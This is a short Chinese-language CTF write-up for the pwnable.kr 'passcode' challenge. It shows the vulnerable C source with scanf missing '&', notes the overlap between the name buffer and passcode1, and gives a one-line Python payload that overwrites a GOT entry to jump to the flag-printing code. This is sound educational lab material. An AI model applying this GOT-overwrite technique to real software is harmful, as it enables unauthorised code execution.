writeup-passcode

本文介绍了一种基于passcode的登录系统破解过程。通过分析源码发现漏洞,并利用GDB进行调试,最终通过构造特定payload完成flag获取。

Mommy told me to make a passcode based login system.
My initial C code was compiled without any error!
Well, there was some compiler warning, but who cares about that?

ssh passcode@pwnable.kr -p2222 (pw:guest)
题目如上

拿到题目,先分析下源码

代码如下

#include <stdio.h>
#include <stdlib.h>

void login(){
    int passcode1;
    int passcode2;

    printf("enter passcode1 : ");
    scanf("%d", passcode1);
    fflush(stdin);

    // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
    printf("enter passcode2 : ");
        scanf("%d", passcode2);

    printf("checking...\n");
    if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
        exit(0);
        }
}

void welcome(){
    char name[100];
    printf("enter you name : ");
    scanf("%100s", name);
    printf("Welcome %s!\n", name);
}

int main(){
    printf("Toddler's Secure Login System 1.0 beta.\n");

    welcome();
    login();

    // something after login...
    printf("Now I can safely trust you that you have credential :)\n");
    return 0;   
}

看了下源码,貌似是要passcode1和passcode2等于338150 和 13371337

编译了一下,发现scanf那里没有加&,那写入的地址应该是随机的,完全没有头绪,先扔IDA和gdb一下

gdb调试了一下,发现读入的name最后四个字节就是passcode1的默认值(这里记得要上服务器把文件拖下来,自己编译的并没有这个漏洞)

有了这个漏洞还是不行,查了下别人wp,又补充了下基础知识。。。

got表覆写:http://blog.youkuaiyun.com/smalosnail/article/details/53247502

补充完知识之后就愉快的构造payload吧

python -c “print ‘A’ * 96 + ‘\x04’+’\xa0’+’\x04’+’\x08’ + str(0x80485e3)” |./passcode

然后拿到flag

Sorry mom.. I got confused about scanf usage :(

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值